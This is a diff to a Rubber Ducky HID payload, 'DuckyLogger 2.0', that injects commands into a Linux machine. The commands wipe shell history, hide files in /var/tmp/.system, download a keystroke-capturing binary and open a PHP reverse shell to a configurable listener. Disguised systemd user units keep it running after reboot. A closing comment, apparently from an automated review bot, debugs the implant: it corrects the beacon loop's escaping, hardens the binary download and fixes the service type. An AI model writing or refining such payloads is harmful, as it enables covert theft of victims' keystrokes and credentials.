diff --git a/payloads/library/credentials/DuckyLogger2/payload.txt b/payloads/library/credentials/DuckyLogger2/payload.txt
index 0cc4650ea..1d8fb2b0e 100644
--- a/payloads/library/credentials/DuckyLogger2/payload.txt
+++ b/payloads/library/credentials/DuckyLogger2/payload.txt
@@ -1,6 +1,6 @@
 REM Title: DuckyLogger 2.0
 REM Description: Keylogger which sends each and every keystroke of the target remotely/locally.
-REM AUTHOR: drapl0n
+REM Author: drapl0n
 REM Version: 2.0
 REM Category: Credentials
 REM Target: Unix-like operating systems with systemd.
@@ -9,66 +9,111 @@ REM Attackmodes: HID
 REM [Note]
 REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.
+REM REQUIRED IP and Port for listener
+DEFINE #IPADDR 0.0.0.0
+DEFINE #PORT 4444
+
+REM REQUIRED URL to download xinput binary - example: https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
+DEFINE #BINARY_URL example.com
+
+REM How long to wait for download to complete
+DEFINE #DOWNLOAD_DELAY 2500
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
+REM Do not continue to execute on windows
+IF ($_OS == WINDOWS) THEN
+ LED_R
+ ATTACKMODE OFF
+ STOP_PAYLOAD
+END_IF
+
 REM [keeping tracks clear]
 DELAY 500
-CTRL-ALT t
+CTRL ALT t
 DELAY 400
-STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
-ENTER
+STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
 DELAY 100
 REM [creating key logging mechanism]
-STRING mkdir /var/tmp/.system
-ENTER
+STRINGLN mkdir /var/tmp/.system
 DELAY 100
-STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
-ENTER
+STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
 DELAY 100
-STRING chmod +x /var/tmp/.system/sys
-ENTER
+STRINGLN chmod +x /var/tmp/.system/sys
 DELAY 100
 REM [importing xinput]
-STRING cd /var/tmp/.system/
-ENTER
+STRINGLN cd /var/tmp/.system/
 DELAY 100
-STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
-ENTER
-DELAY 2500
-STRING chmod +x xinput
-ENTER
+STRINGLN wget --no-check-certificate --content-disposition #BINARY_URL
+DELAY #DOWNLOAD_DELAY
+STRINGLN chmod +x xinput
 DELAY 100
 REM [creating reverse shell]
-STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
-ENTER
+STRINGLN echo -e "while :\ndo\n\tping -c 5 #IPADDR\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"#IPADDR\",#PORT);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
 DELAY 100
-STRING chmod +x /var/tmp/.system/systemBus
-ENTER
+STRINGLN chmod +x /var/tmp/.system/systemBus
 DELAY 100
 REM [creating systemd service to execute payload on boot]
-STRING mkdir -p ~/.config/systemd/user
-ENTER
+STRINGLN mkdir -p ~/.config/systemd/user
 DELAY 200
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
-ENTER
+STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 DELAY 100
 REM [creating systemd timer unit]
-STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
-ENTER
+STRINGLN echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
 DELAY 100
 REM [enabling service]
-STRING systemctl --user daemon-reload
-ENTER
+STRINGLN systemctl --user daemon-reload
 DELAY 300
-STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
-ENTER
+STRINGLN systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
 DELAY 150
-STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
-ENTER
+STRINGLN systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
 DELAY 150
-STRING exit
-ENTER
+STRINGLN exit
+
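Review bot: In the rewritten reverse-shell line (`STRINGLN echo -e "while :\n...\tif [ $? -eq 0 ]; then...`), `$?` sits unescaped inside the double-quoted string that the target's shell expands when `echo` runs, so the generated `systemBus` script receives the exit status of the preceding `chmod +x xinput` as a literal (e.g. `if [ 0 -eq 0 ]`) instead of testing the `ping` result, and the beacon loop fires regardless of reachability; the same line already escapes `\$sock`, so escape this too: `if [ \$? -eq 0 ]`. The `STRINGLN wget --no-check-certificate --content-disposition #BINARY_URL` line fetches an executable with TLS verification disabled and no integrity check before `chmod +x xinput`, and relies on the server's Content-Disposition to name the file `xinput`; unless the download host is known to use a self-signed certificate, drop `--no-check-certificate`, pin the filename with `wget -O xinput #BINARY_URL`, and verify it with `echo "<sha256>  xinput" | sha256sum -c || exit` before marking it executable. The new defaults `#IPADDR 0.0.0.0` and `#BINARY_URL example.com` are placeholders that, if left as-is, make the implant beacon to the local host and save an HTML page rather than the binary; a `REM` next to the DEFINEs stating that both must be replaced before compiling would make that explicit. Separately, the generated unit keeps `Type=forking` for a script that loops forever without daemonizing — presumably systemd times the start out and the unit only stays up through `Restart=always` — so `Type=simple` looks like the intended type.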